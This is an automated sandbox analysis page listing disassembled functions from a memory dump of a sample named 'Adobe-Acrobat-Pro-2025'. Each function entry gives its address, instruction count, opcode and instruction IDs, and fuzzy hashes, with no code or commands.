Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: ;T*J
API String ID: 0-2495169142
Opcode ID: 35cec67e5d3b1fd3c39e86386404bbc3abfe1d6a5f4ff3f27f456834dc80854b
Instruction ID: 9a3751d4b1efee820a142a820981a32422073a5756cf23eb9c833551ed95f0eb
Opcode Fuzzy Hash: 35cec67e5d3b1fd3c39e86386404bbc3abfe1d6a5f4ff3f27f456834dc80854b
Instruction Fuzzy Hash: FB0122711483428AC300CF26D4901ABBBE2EFD9709F16D81DE0D54B361D778A44ADB1F

Function 0043FD53 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

;T*J, xrefs: 0043FDCA

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID: ;T*J
API String ID: 0-2495169142
Opcode ID: fd595654f9960d7bea8436229b22492c344737b939ba4a18aad7165f38e391b6
Instruction ID: fac13087410818e2afc5bd599313b3d80e5b5078c9c3cd93c8a49ce6e14f9423
Opcode Fuzzy Hash: fd595654f9960d7bea8436229b22492c344737b939ba4a18aad7165f38e391b6
Instruction Fuzzy Hash: 1A1102355483428BC300CF26E4901BBBBE2AFDA709F25981DE0D59B390DB789447DB1E

Function 0041405B Relevance: .7, Instructions: 743COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ba7c522bea5723e103a7f5848757a06da0eba4447804295f86144226deb0f0e
Instruction ID: 4c1b273a8ffba490fc5f34662d9d6286560f3f42bd3349b5224ec399834c7abf
Opcode Fuzzy Hash: 6ba7c522bea5723e103a7f5848757a06da0eba4447804295f86144226deb0f0e
Instruction Fuzzy Hash: 5C1226B1A102158BCB24CF68C8926FB77F1FF8A320F19415AE852DB3D1E7799841C7A5

Function 00402E20 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0da6c8002f94b68e0adf4af87ad6beb74fc0d9ec83bc5b0937df38de926ba7db
Instruction ID: c7951e3dd641ad960597c3ba69dc2837bfc79f1929b8cf0464f4aa79e5d620f9
Opcode Fuzzy Hash: 0da6c8002f94b68e0adf4af87ad6beb74fc0d9ec83bc5b0937df38de926ba7db
Instruction Fuzzy Hash: 5852F3715083458FCB15CF24C0906AABFE1FF89315F188A7EE8996B381D778DA49CB85

Function 00406500 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 272fe2a114a3517da02e52e0eb196479fed93dccc8eb93d664972ef7a16be8a2
Instruction ID: a89598f363e2251a32bfc7a1c2b4b50cb448ac1df7718c12c9f2b19afb625c99
Opcode Fuzzy Hash: 272fe2a114a3517da02e52e0eb196479fed93dccc8eb93d664972ef7a16be8a2
Instruction Fuzzy Hash: 4E52C2B0A08B848FE731CB24C4843A7BBE1AB51314F15583FC5E716BC6C27DA995CB5A

Function 004072E0 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e797157fb35717b6a91bbe19d3c6782b16ec68ef1e5ad1ec3f47f605a4e618f
Instruction ID: 6aa15a5b34d21658a1baa4e5be7eacebbf3f5ccb0f0fdeba02d75ab089b0fcc3
Opcode Fuzzy Hash: 6e797157fb35717b6a91bbe19d3c6782b16ec68ef1e5ad1ec3f47f605a4e618f
Instruction Fuzzy Hash: FB22A272A087118BD725DF18D8806ABB3E1BFC4315F19893ED986A7385D738B815CB47

Function 00403830 Relevance: .6, Instructions: 600COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e869429afb5f3bf3e34cf0fb6ab20e9bc8eaf7373eb5fec64128e81106857b60
Instruction ID: 92912b86f73cf1e27a3294272ae9c135cdd53fb94e9c541362e0e53dcca9f4cf
Opcode Fuzzy Hash: e869429afb5f3bf3e34cf0fb6ab20e9bc8eaf7373eb5fec64128e81106857b60
Instruction Fuzzy Hash: 1A323270914B118FC328CF29C68052ABBF5BF45711B604A2ED6A7A7F91D33AF945CB18

Function 00405810 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
Instruction ID: 044e4b2230f760556c4fead5d06953ea8f0d2b06d6e8608db199ffa83231fa67
Opcode Fuzzy Hash: 0f22763de4bcdc26485400349c62461b958b278f38fe56ac1e4a402e23215dde
Instruction Fuzzy Hash: 0BE16A7120C7418FD721DF29C880A2BBBE1EF99300F448C2EE5D597792E279E944CB96

Function 0041C0B0 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f477a718eb4feb8706fb056a8dac20c944f79676aba537a235553eaefe366873
Instruction ID: d9dc0d2d221b76e8d5c1493ae0fe87ac5ecd7e4ea5ecd46ffe745e0fd85d78f6
Opcode Fuzzy Hash: f477a718eb4feb8706fb056a8dac20c944f79676aba537a235553eaefe366873
Instruction Fuzzy Hash: B6D13870988300AFD7148F24CC8176ABBE2BFD5314F148A2EF8D8973A1D7399C558B4A

Function 004339AE Relevance: .4, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dbc78e8397c732a54985fa2aad791679612b0a5a05a25c3e2f38b81e7346eec
Instruction ID: 7a2ab346c5af4c7b383fb7b7667457c950b39e6499582cd652c73de57075035e
Opcode Fuzzy Hash: 7dbc78e8397c732a54985fa2aad791679612b0a5a05a25c3e2f38b81e7346eec
Instruction Fuzzy Hash: 5BF1D371504BD18BD3158B3CC491352FFE0AF26208F58C6AED5EACB783C26AD546CBA5

Function 00434949 Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d677392f2b780b57c1806b8b6446cbc4ea3306311b5741d942a123043cde87a0
Instruction ID: 5afc1f8dd3838b1af7c0e5723f74611e0a3c0c060ac5956a73830ff9501dafbb
Opcode Fuzzy Hash: d677392f2b780b57c1806b8b6446cbc4ea3306311b5741d942a123043cde87a0
Instruction Fuzzy Hash: 6AE10121608BD08FC35A8B3CC451362BFE26F62208F5CC5AEC4DACBB97D669E515C761

Function 00430D7A Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89fc2945b693185b0ab0636575e2da55b2b929b49542636ebc880e1a45ad9b54
Instruction ID: 51d1d3e9cf8c640badea4a4eab0526f5914cfda4a1264c2e994369cd6b3837a8
Opcode Fuzzy Hash: 89fc2945b693185b0ab0636575e2da55b2b929b49542636ebc880e1a45ad9b54
Instruction Fuzzy Hash: 21D11272608B808BD3258B7CC891397BFD25BDA224F1DCA7DD5FE87382D67464058716

Function 00406070 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a47cf4779e96c498a3bacb3a1360b7721c88dbd32f3e99254b456f432f8d3c8a
Instruction ID: f647c5a18d037443a0723cd7ef3deb043d8acd378d43cf28be9787060d0258a6
Opcode Fuzzy Hash: a47cf4779e96c498a3bacb3a1360b7721c88dbd32f3e99254b456f432f8d3c8a
Instruction Fuzzy Hash: 13C15BB29487418FC360CF68CC86BABB7E1BF85318F09493DD1DAD6242D778A155CB4A

Function 00441930 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4561cf8501ee3b9af5c8762e78f5495864843a7dfa25c85296947e3596d81e89
Instruction ID: 7abedd23c36a1ad48ef131475bb6c2f1dc45537a473a90573397e2c8fbc3711d
Opcode Fuzzy Hash: 4561cf8501ee3b9af5c8762e78f5495864843a7dfa25c85296947e3596d81e89
Instruction Fuzzy Hash: 4781E5756043119BE728CF18D890A2BB3A2FFC9310F19856DE9564B3B1EB35EC91CB45

Function 004329F5 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0cfbaa1a636968ec380e563790d89e2221f62ff23e6ea1140bb99d2577dc7f
Instruction ID: cc9e73cd3de1ef362d86f1f739bc46c2ed379ed4826ddb435c8e52725076cb89
Opcode Fuzzy Hash: 5b0cfbaa1a636968ec380e563790d89e2221f62ff23e6ea1140bb99d2577dc7f
Instruction Fuzzy Hash: EEA18F72509BC08FD3259B3884953DBBFE25BA6214F09CDADC4EF87782D639A405C716

Function 0041DA30 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 657622f71055675c28a5eb3f7018b19c87ae6885eb9506eb06d0a9b69aa1b23d
Instruction ID: ef2574a0f7261b7abfc8f53d4608c39c2ff6b4da06fc74f0357fc2fab1e14e73
Opcode Fuzzy Hash: 657622f71055675c28a5eb3f7018b19c87ae6885eb9506eb06d0a9b69aa1b23d
Instruction Fuzzy Hash: 4C619C75A0C3904FC725CF28C88096E7BE1AF96310F0986BEE8D54B392D679DC45C796

Function 0042D188 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21fc7cf3a8630226704c0f2d688def1d12650bda9c6a53f89b049cfca8d8fdd7
Instruction ID: 7ff35ea2cfcc81e0e9e2ecae13b853276865707c74303d9f79d4430f923056d3
Opcode Fuzzy Hash: 21fc7cf3a8630226704c0f2d688def1d12650bda9c6a53f89b049cfca8d8fdd7
Instruction Fuzzy Hash: 57514870A15B908AD7258F3AD450773BBE2AFE7305B5C85ADC0C747B46CBB8940AC764

Function 00428F3B Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1099483ae077771331052c9e83c57104b543fd89d840ec63be32c6823e6f271
Instruction ID: 9b0480aa1a709cc03b2a4233c1b980745aa1d17495d0b489593bc2f345556275
Opcode Fuzzy Hash: f1099483ae077771331052c9e83c57104b543fd89d840ec63be32c6823e6f271
Instruction Fuzzy Hash: BC51F872A14B254BC719DE2CD85063EB2D29BC8300F8A863DDD578B386EE34AC15C785

Function 0042D15C Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 431d55c7484c9474ae8eb292e0dbc4817a495e01c2052813750621bf7ea3f978
Instruction ID: e425f2158dd165af7fed07e42c20263981c1a65717fe31fb7945d41da5e42a9d
Opcode Fuzzy Hash: 431d55c7484c9474ae8eb292e0dbc4817a495e01c2052813750621bf7ea3f978
Instruction Fuzzy Hash: D8417970A04B908ED7258F36D090773BBE2AFA3305B5885ADC4C74B686C778940AC768

Function 00439CF0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bf583598644422afce8536af2e62cbbf7a390ff81a33fb94cbd8941e47ce8fb
Instruction ID: 01751bef53d1a5c16f87dc316961cc66a19f89e31336aad62c939a8d9876c6c7
Opcode Fuzzy Hash: 9bf583598644422afce8536af2e62cbbf7a390ff81a33fb94cbd8941e47ce8fb
Instruction Fuzzy Hash: 88516EB16087549FE314DF29D49535BBBE1BBC8318F044A2EE4D987391E379DA088F86

Function 0043B9D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41acb5a63bf6728114bcb157bb5b205702600023841d2b37553ae9ee873799db
Instruction ID: e4432e3fb42365994c1ba3fbc91e8e3d6713b72aed67d927f59ba9bf96b38bae
Opcode Fuzzy Hash: 41acb5a63bf6728114bcb157bb5b205702600023841d2b37553ae9ee873799db
Instruction Fuzzy Hash: D851D732B18A504BD3159D3D8C9136BBA929BCA730F19C77EFAB5CB3D5D63888054386

Function 0043DD60 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b527a452fe2ed0d9760ed4009c85b08a26f928805ed199801713dcbebd3110d7
Instruction ID: f41edccdf39e8e3f5e162d8bd6979ff3b89f76e54a3dcf74f0a0295d224c59af
Opcode Fuzzy Hash: b527a452fe2ed0d9760ed4009c85b08a26f928805ed199801713dcbebd3110d7
Instruction Fuzzy Hash: B1412976E047109BD724DF28E880627BB62EBDA734F19A62ED8551B3A0C3349C11C7C9

Function 0042D0F9 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7becec6abe0022aa727c0a3358ddb5f5cb0775792fb51534808bba12c96d81f0
Instruction ID: 0b769ea658b6e93df627787fbdef891a483f798f9811bc0c8755349e1b62d04b
Opcode Fuzzy Hash: 7becec6abe0022aa727c0a3358ddb5f5cb0775792fb51534808bba12c96d81f0
Instruction Fuzzy Hash: 5C412770A14B908EC725CF26D490763BBE2AFA7305B5885ADC4C74B646C778A40A8BA4

Function 0043B870 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a81ff4d9c3e3d03fff46d0caa3af80905126ed82a4d5d8792193223a09aa7935
Instruction ID: feb9d612f02c409f858e198596824f6395d6c9b8b1c85f81bbed73531f00a187
Opcode Fuzzy Hash: a81ff4d9c3e3d03fff46d0caa3af80905126ed82a4d5d8792193223a09aa7935
Instruction Fuzzy Hash: FD310AF1A043046BE710AB25DC81B3BB7A8DF8A758F10682EFA8593251D335EC1587DB

Function 00408BE0 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db84d7b91779c3e05c5773d4812b2947ccd0160c6fb62a48ed6f76000d821e9
Instruction ID: 2dcdef9b453d54e0b0f811ef7f42968a2d33c0453aab0201decf26e48411ca7d
Opcode Fuzzy Hash: 3db84d7b91779c3e05c5773d4812b2947ccd0160c6fb62a48ed6f76000d821e9
Instruction Fuzzy Hash: EB31C2216597458FF7184A2885911B7BBD0DF62360F0D477EC8D2273D2CA2C8908D379

Function 0042D6E9 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d867555d55223fa8132a12ad24e18b19b0505e8eb82292a1bfe7db8bd5796087
Instruction ID: 91be1584e79b036e578f133aded17ff9fc7077e2f901835f93b781773a956848
Opcode Fuzzy Hash: d867555d55223fa8132a12ad24e18b19b0505e8eb82292a1bfe7db8bd5796087
Instruction Fuzzy Hash: C9412675A057418FD7158F29C891762FBA2FF97310F68969DC0A28B396CB3C9402CB89

Function 0042D6DE Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6174d1694936d0842c6c0b4c998df5f8f4b5e37003beb0a707c7bd7c60c2a727
Instruction ID: 8779711641cf34f7cef3cce14ca9cf2ed32dbe570ade5c009cde5487de65edfa
Opcode Fuzzy Hash: 6174d1694936d0842c6c0b4c998df5f8f4b5e37003beb0a707c7bd7c60c2a727
Instruction Fuzzy Hash: 7F310775A017018FD3158F29C891766FBA2FFD7310B68975DC0918B396CB3C9802CB89

Function 00437560 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 16c2cfaa3309f4005742a9e2f0f19eb5d589ddb5ace88c010faa8d99e7153ead
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 15112C3360D1D40EC32A8D3C84005B57F930AD7234F1D539AF4F8976D2D526CD8A8359

Function 0042AAF0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7ab49cda4e9af2de01923caceb7c874f93d21650d9865ffbe9df26a43861727
Instruction ID: 39fe957c0b1c502df9befa20b34faa96874558d0ded0089de233304b7b6d616d
Opcode Fuzzy Hash: b7ab49cda4e9af2de01923caceb7c874f93d21650d9865ffbe9df26a43861727
Instruction Fuzzy Hash: B6019EB1B0131157D7209E11E4C1B27B6AA6F95708F48003EED0967342EBBEFC25C29B

Function 0043EA83 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8630693bdb0dfff413b577786009d71b51d9932502ed3cfb5dc941a3650c6512
Instruction ID: 8e92eb5fed32ed34c401a3894f669a49921ed08b868acc455038c12dadafea9f
Opcode Fuzzy Hash: 8630693bdb0dfff413b577786009d71b51d9932502ed3cfb5dc941a3650c6512
Instruction Fuzzy Hash: B4119AB5D127059BC704CFAA98912AABBB5BB8A210F14822ED091A7742E3749911CBD9

Function 00402AA0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af286c905043be0a792e9d97442b43add99bd34efa52f7d6218f39eb0375b973
Instruction ID: 8490fa70d76444351db743e1d6b72347aef14407714b25a29a267c4a54982fb2
Opcode Fuzzy Hash: af286c905043be0a792e9d97442b43add99bd34efa52f7d6218f39eb0375b973
Instruction Fuzzy Hash: B901F92E79430A0BE3109DEA9CC4566F3D6D7D5654B5C5139DA80E3381EDF9F8064194

Function 0043DF10 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f1a21f43b9f9480addf9961ecc879b4cf1a6d25462f7a6250059bcff26555b3
Instruction ID: 067100a68da3734ceef286927c51329d83c5d2cddb68ce8ade51e8d19f9d6c8c
Opcode Fuzzy Hash: 4f1a21f43b9f9480addf9961ecc879b4cf1a6d25462f7a6250059bcff26555b3
Instruction Fuzzy Hash: 87F0D6B6904204BB92104A05AC80D37776EEB8E768F10122AF516132A1E222AD2196A9

Function 00416BBC Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0056fa02f9740295363da2b5f3a9ffdd73d66ef9eaf3acd87f3681bfdcd4004f
Instruction ID: 3c35967a600b2926bbdffa719d6acebd2311165e9fd1307ea623fa7b25914b37
Opcode Fuzzy Hash: 0056fa02f9740295363da2b5f3a9ffdd73d66ef9eaf3acd87f3681bfdcd4004f
Instruction Fuzzy Hash: 37F02BB4905201AFDB149F14CC109B7B2A9FF85308F17492EF08653121E234EC51C75A

Function 0041DCA0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9f89bc5d49024418ebaac0d6223f42d2556c6a5f22dbd203d69d6cbbeed48b5
Instruction ID: 2f126e0b3f19db4c28d7dcd0d4958215c2faafe41d461a3b30b6df3593ef4be4
Opcode Fuzzy Hash: e9f89bc5d49024418ebaac0d6223f42d2556c6a5f22dbd203d69d6cbbeed48b5
Instruction Fuzzy Hash: ABD05E619497B00E9265CE2444905B7B7BAAACB122B1CA85FD9E2E3304D229D805A668

Function 0040BFE0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d25b4aedf158bfb0f01bc652a2ff8435c4ec84d04df7f9548307c5c3fc7bf019
Instruction ID: ddb09476eb5fca449da90bd1dbf9d6ca56a1277c12643f36ee6ab11675ca4198
Opcode Fuzzy Hash: d25b4aedf158bfb0f01bc652a2ff8435c4ec84d04df7f9548307c5c3fc7bf019
Instruction Fuzzy Hash: 5DD023586010489B951C5B35DC57D37B53DC783204F0030247901E7381D6009C1082BD

Function 0040BD40 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a016597064b2055e75c20a59972b371f99d9d987c95ac948251c3834270ae836
Instruction ID: ff8760c7d69cd03e7dc96064ca52e0d55310d32c2484234c7f8b05959651ac38
Opcode Fuzzy Hash: a016597064b2055e75c20a59972b371f99d9d987c95ac948251c3834270ae836
Instruction Fuzzy Hash: B4D05E7DA58600CBC328DF10DC04B29B335FB97301F16AA28E981233A0CA38E814CA4E

Function 0043FC42 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85e0ec7e75de27553744eb03822f449e296cc3f318117c384c739968c787809e
Instruction ID: bc27c59a1980963a34091d555ed054339d786c60c51b416ef8556cb44409f049
Opcode Fuzzy Hash: 85e0ec7e75de27553744eb03822f449e296cc3f318117c384c739968c787809e
